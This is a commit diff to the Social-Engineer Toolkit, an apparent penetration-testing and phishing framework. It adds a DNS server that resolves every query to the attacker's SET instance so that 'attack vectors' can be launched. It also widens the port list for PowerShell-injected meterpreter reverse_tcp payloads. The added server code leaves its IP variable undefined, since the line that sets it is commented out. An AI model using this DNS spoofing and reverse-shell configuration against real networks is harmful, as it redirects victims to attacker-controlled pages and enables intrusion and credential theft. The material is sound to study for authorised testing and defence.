Added a DNS server for version 4.7.1

config/set_config

@@ -266,7 +266,9 @@ CLEANUP_ENABLED_DEBUG=OFF
 ### WHO CLICKED ON THE LINK AND FROM WHAT PERSON / EMAIL ADDRESS WAS USED. THIS WORKS ON ALL WEB-BASED ATTACKS AND SPEAR-PHISHING.
 ### 
 ### NOTE: IN ORDER FOR THIS TO WORK YOU MUST ENABLE WEBATTACK_EMAIL and APACHE_SERVER TO ON.
-###
 TRACK_EMAIL_ADDRESSES=OFF
 #
+### THIS ALLOWS YOU TO TURN A DNS SERVER ON IN SET. ALL RESPONSES WILL REDIRECT TO THE SET INSTANCE WHICH CAN LAUNCH ATTACK VECTORS
+DNS_SERVER=ON
+#
 #######################################################################################################################################

config/set_config.py

@@ -9,10 +9,10 @@
 #  SET updated using the 'Update SET Configuration' menu item in      #
 #  the main menu. This file will be updated with the new settings.    #
 #                                                                     #
-#  set_config.py generated: 2013-03-16 15:08:58.338592                #
+#  set_config.py generated: 2013-03-16 15:24:03.199144                #
 #                                                                     #
 #######################################################################
-CONFIG_DATE='2013-03-16 15:08:58.338592'
+CONFIG_DATE='2013-03-16 15:24:03.199144'
 METASPLOIT_PATH="/opt/metasploit/apps/pro/msf3"
 METASPLOIT_DATABASE="postgresql"
 ENCOUNT=4
@@ -65,7 +65,7 @@ POWERSHELL_INJECTION=True
 POWERSHELL_INJECT_PAYLOAD_X64="windows/x64/meterpreter/reverse_tcp"
 POWERSHELL_INJECT_PAYLOAD_X86="windows/meterpreter/reverse_tcp"
 POWERSHELL_MULTI_INJECTION="True"
-POWERSHELL_MULTI_PORTS="22,53,443"
+POWERSHELL_MULTI_PORTS="22,53,443,21,25,8080"
 POWERSHELL_VERBOSE=False
 WEB_PROFILER=False
 DEPLOY_OSX_LINUX_PAYLOADS="False"
@@ -78,3 +78,4 @@ METASPLOIT_MODE=True
 DEPLOY_BINARIES="YES"
 CLEANUP_ENABLED_DEBUG="False"
 TRACK_EMAIL_ADDRESSES="False"
+DNS_SERVER="True"

readme/CHANGES

@@ -9,6 +9,7 @@ version 4.7.1
 * added dynamic patching of metasploit shellcode which allows certain payloads to not have to generate shellcode with msfvenom each time (very fast generation)
 * standardized metasploit_shellcode to a setcore library and now being used by create_payload.py and powershell/prep.py
 * added additional standard ports to the powershell_injection since its much faster to generate now.
+* added a new config option called DNS_SERVER which allows you to configure SET as a DNS server and hae all traffic route through it. Just turn it on and you have a full fledged DNS server running.
 
 ~~~~~~~~~~~~~~~~
 version 4.7

set

@@ -42,6 +42,9 @@ if operating_system == "posix":
         # change permissions if nix
         subprocess.Popen("chmod +x set-automate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
 
+
+start_dns()
+
 # remove old files
 for root, dirs, files in os.walk('src/program_junk/'):
     for f in files:
@@ -182,9 +185,9 @@ except KeyboardInterrupt:
         print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
 
 # handle exceptions
-#except Exception, error:
- #       log(error)
-  #      print "\n\n[!] Something went wrong, printing the error: "+ str(error)
+except Exception, error:
+        log(error)
+        print "\n\n[!] Something went wrong, printing the error: "+ str(error)
 
 # cleanup routine
 cleanup_routine()

src/core/setcore.py

@@ -15,6 +15,7 @@ import string
 import inspect
 import base64
 from src.core import dictionaries
+import multiprocessing
 
 # check to see if we have python-pycrypto
 try:
@@ -1419,3 +1420,53 @@ def check_ports(filename, port):
 		return True
 	else:
 		return False
+
+# main dns class
+class DNSQuery:
+  def __init__(self, data):
+    self.data=data
+    self.dominio=''
+
+    tipo = (ord(data[2]) >> 3) & 15   # Opcode bits
+    if tipo == 0:                     # Standard query
+      ini=12
+      lon=ord(data[ini])
+      while lon != 0:
+        self.dominio+=data[ini+1:ini+lon+1]+'.'
+        ini+=lon+1
+        lon=ord(data[ini])
+
+  def respuesta(self, ip):
+    packet=''
+    if self.dominio:
+      packet+=self.data[:2] + "\x81\x80"
+      packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'   # Questions and Answers Counts
+      packet+=self.data[12:]                                         # Original Domain Name Question
+      packet+='\xc0\x0c'                                             # Pointer to domain name
+      packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'             # Response type, ttl and resource data length -> 4 bytes
+      packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
+    return packet
+
+# main dns routine
+def dns():
+        print_status("Started DNS Server for The Social-Engineer Toolkit..")
+        udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        udps.bind(('',53))
+	#ip = grab_ipaddress()
+	try:
+		while 1:
+      			data, addr = udps.recvfrom(1024)
+      			p=DNSQuery(data)
+      			udps.sendto(p.respuesta(ip), addr)
+      			print 'Response: %s -> %s' % (p.dominio, ip)
+
+	except KeyboardInterrupt:
+    		print "Exiting the DNS Server.."
+    		udps.close()
+
+# start dns with multiprocessing
+def start_dns():
+	dns_check = check_config("DNS_SERVER=")
+	if dns_check.lower() == "on":
+		p = multiprocessing.Process(target=dns)
+		p.start()